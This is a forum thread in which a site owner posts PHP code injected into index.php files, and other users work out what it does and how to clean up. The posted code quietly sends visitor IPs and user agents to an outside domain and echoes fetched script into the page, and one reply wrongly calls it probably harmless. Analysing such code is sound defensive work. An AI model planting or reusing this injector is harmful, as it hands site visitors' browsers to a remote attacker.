Server Attacked code

PatriceJ · 02-09-2014, 10:25 AM

Hello,

I found on some index.php file the following code added

Code:

#530da5#
error_reporting(0);
ini_set('display_errors',0);
$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_srx6146) && !preg_match ('/bot/i', $wp_srx6146))){
     $wp_srx096146="http://"."html"."value".".com/value"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_srx6146);
   $ch = curl_init();
   curl_setopt ($ch, CURLOPT_URL,$wp_srx096146);
   curl_setopt ($ch, CURLOPT_TIMEOUT, 6);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $wp_6146srx = curl_exec ($ch);
   curl_close($ch);
}
if ( substr($wp_6146srx,1,3) === 'scr' ) {
   echo $wp_6146srx;
}
#/530da5#

Do you know what this code is doing? and what do you suggest to clean the server?

Corpus-Khu · 02-09-2014, 12:45 PM

It is formatted oddly, Possibly sometype of code injection. What happens when you run the code, it looks like it would cause an error - a little later today im going to give this code a little attention, I have no idea what the preg_match is for.

Habitual · 02-09-2014, 01:38 PM

Check the site at http://www.unmaskparasites.com/secur...age=domain.com

Be especially alert for entries under "External References"

Please let us know...

sundialsvcs · 02-09-2014, 02:03 PM

Analyzing the code that is present here, it does not superficially seem to me that the code is malicious, although it is obviously machine-generated as evidenced by the variable-names ... as well as by the beginning and ending recognition-tags that bracket the code. I also know that curl() is fundamentally a mechanism for initiating a programmatic HTTP "ping" against a remote web site. So maybe this simply some kind of instrumentation code, designed to let someone out there gather usage-statistics ... that "someone" being, say, the legitimate owner of the code/site.

I don't recognize which automated utility might have generated this code-sequence, but I can say pretty certainly that it was generated in such a way, and that it was designed to be removable by the same utility with equal ease. If you know who authored the original page, or can contact them, they can probably tell you right away.

My instincts tell me, however, that this code is probably innocent.

astrogeek · 02-09-2014, 02:37 PM

I disagree, superficial analysis shows that if it is there without the website owner's knowledge, then it is an entirely malicious method of injecting content/code from a remote site into the page.

Here is a summary of what it does in pseudo code but with the actual variable names and paths:

Code:

error_reporting(0) - Disable the page's error reporting to avoid detection

$wp_srx6146 = @$_SERVER['HTTP_USER_AGENT'] - Get the user agent string

Test if it is a browser and not a bot, if so...

$wp_srx096146="http://htmlvalue.com/value/?ip=..."

Makes remote request with user IP addr, page referer and user agent, useful for delivering ads,
but also useful for more nefarious purposes such as automated compromise attempts of the user
machine...

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_6146srx = curl_exec ($ch);

Fetches "something" from the remote host htmlvalue.com and assigns it to a new variable $wp_6146srx

if ( substr($wp_6146srx,1,3) === 'scr' ) {
   echo $wp_6146srx;
}

Finally, if the expected something was returned as identified by characters 1-3='scr', 
echo it into the web page...

Now, note that the final test matches <script>, so undoubtedly it is fetching and injecting javascript into the user's web page. At this point they own the browser view of that page...

They may be injecting ads, or they may be injecting something MUCH worse...

A sure-fire way to see what it is injecting is to put your IP address into the following URL and fetch it with wget. I have not done so as I do not want to launch a bot attack on my own IP!

htt p://html value.com/value/?ip=YOUR_IP&referer=SOME_REFERER&ua=SOME_USER_AGRENT

If you care to do that and it returns something that looks like code, post it back here and I'll tell you what it really does...

The domain info (private):

Quote:

Registrant:

Name: Private Protection Co.LTD
Organization: Private Protection Co.LTD.
Address: NO.1111 Chaoyang Road, Beijing
City: Beijing
Province/state: BJ
Country: CN
Postal Code: 100000

PatriceJ · 02-10-2014, 02:08 AM

Thanks all of you for your time and answers.

I will test the code on my testing server and will let you know.

Patrice

voleg · 02-10-2014, 02:37 AM

This part is only reporting part about browsers visited this page,
and looks like simple statistics counter, but:

Looks like you have other parts of code, injecting something in rest of page(s).
Then, this report becomes interesting for attacker about infectected browsers.

1. Restore from good backup.
2. Make most things read only.
3. Close outgoing traffic by FW (if possible).

PatriceJ · 02-22-2014, 11:29 AM

Hello,

I have run the script on a dummy server that I use for test only.

I have used Wireshark to catch the traffic made by the code.

See the attached file.

If you could help decrypt, I would appreciate a lot.

I have changed the first number of my intranet IP by MyIntranetIP
194.158.122.10 is a DNS server

Thank you

Patrice

unSpawn · 02-22-2014, 02:29 PM

I'm sorry but Corpus-Khu should never have made that suggestion in the first place. (In a VM maybe, but you simply don't go around asking a victim to run code, especially code you don't understand yourself.)

The focus should have been on examining the extent of the damage, finding out how this could have taken place and then taking the appropriate measures.
Now you posted this on the 9th, meaning almost 2 weeks have passed, so please first tell me you did more for this server than play with Wireshark?
What did you do?
What did you find out?

PatriceJ · 02-24-2014, 12:59 PM

I found nothing......
Wireshark seems to show that he try to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.

Habitual · 02-24-2014, 01:05 PM

Over here... you said "I found the following code in several index.php files."

have you cleaned them?

astrogeek · 02-24-2014, 02:10 PM

Quote:

Originally Posted by PatriceJ

I found nothing......
Wireshark seems to show that he try to get info from the server, but I'm not sure.
The dummy server did not show anything else in the logs.
The running server is (seems) fine.

But other than finding out how the code got there, and removing it, it really isn't about the server!

The malicious traffic is not between that code and your server, it is between the remote host which the script contacts and the client which loads the script code from your server! So watching your own traffic log will not really show anything!

As Habitual asked, have you removed the code from all the files where you found it?

unSpawn · 02-24-2014, 02:48 PM

Looking for your code you won't find much, but search for another wp_ value... Seems quite widespread. Anyway, here is another explanation, in line with what astrogeek wrote, and this points to a possible infection vector, leeched FTP credentials basically. Please check any machine with admin access for viruses and malware, check your server logs for intrusions and check whatever installed in your web stack for no longer maintained plugins or themes and basically any software versions considered stale, vulnerable.

astrogeek · 02-24-2014, 03:59 PM

For web 101 class today, I have prepared a simple sequence diagram to illustrate where your server and the malicious script fits into the overall scheme of such... schemes.

Hopefully it will make clear that your server is only a vector for delivering the script, which is itself a vector for delivering additional scripts and potentially gaining access to and control of the client machine, i.e. your site visitors.

The sequence of events is from top to bottom, in the direction of the various arrows.

Note that looking at traffic on your server will see very little, only the delivery of the page code, including the script tag, to your site visitors. Everything else takes place after that point and is between one or more remote sites and the client machine itself - not visible to you!

Important to note is not only that they can and usually do vector to other URLs to load additional malware, but beyond the initial script request they have the IP address of your visitors, and everything that they can connect to it! They can then lanuch exploits directly against the client machine, not only via their browser... this is how botnets are constructed.

The follow on effects are spam email, DDOS attacks, banking and credit card fraud, targeted phishing attacks, extortions, threats, con games, manipulations, viruses, worms, obomacare and just about every other asssorted fraud and crime against otherwise innocent victims - all because they visited your website!

Please confirm that you have removed the code from your servers!

PatriceJ · 02-25-2014, 01:53 AM

Thank you everybody for your answers, I appreciate a lot and will continue to investigate.

Of course I have removed all malicious code, it is the first thing I did!